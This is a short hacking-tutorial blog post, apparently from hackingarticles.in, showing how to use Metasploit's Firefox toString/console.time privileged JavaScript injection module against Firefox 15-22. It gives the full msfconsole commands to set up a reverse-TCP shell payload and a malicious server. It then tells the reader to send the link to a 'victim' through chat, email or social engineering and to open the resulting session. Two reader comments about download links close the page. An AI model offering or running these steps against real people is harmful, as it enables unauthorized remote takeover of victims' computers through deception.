Hack Remote Windows, Linux, MAC PC using Firefox toString console.time Privileged JavaScript Injection

This exploit gains remote code execution on Firefox 15-22 by abusing two separate Javascript-related vulnerabilities to ultimately inject malicious Javascript code into a context running with chrome:// privileges.

Exploit Targets
Firefox Version 15-22
Windows 7
Linux
Solaris
OSX

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/multi/browser/firefox_tostring_console_injection
msf exploit (firefox_tostring_console_injection)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_tostring_console_injection)>set lhost 192.168.0.104 (IP of Local Host)
msf exploit (firefox_tostring_console_injection)>set srvhost 192.168.0.104
msf exploit (firefox_tostring_console_injection)>set uripath /
msf exploit (firefox_tostring_console_injection)>exploit


Now an URL you should give to your victim http://192.168.0.104:8080
Send the link of the server to the victim via chat or email or any social engineering technique

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID


2 comments:

Anonymous said...

Brother downloading books links are dead can you update all downloading links?

raj@hackingarticles.in said...

all links are updated please visit www.hackingarticles.in

Post a Comment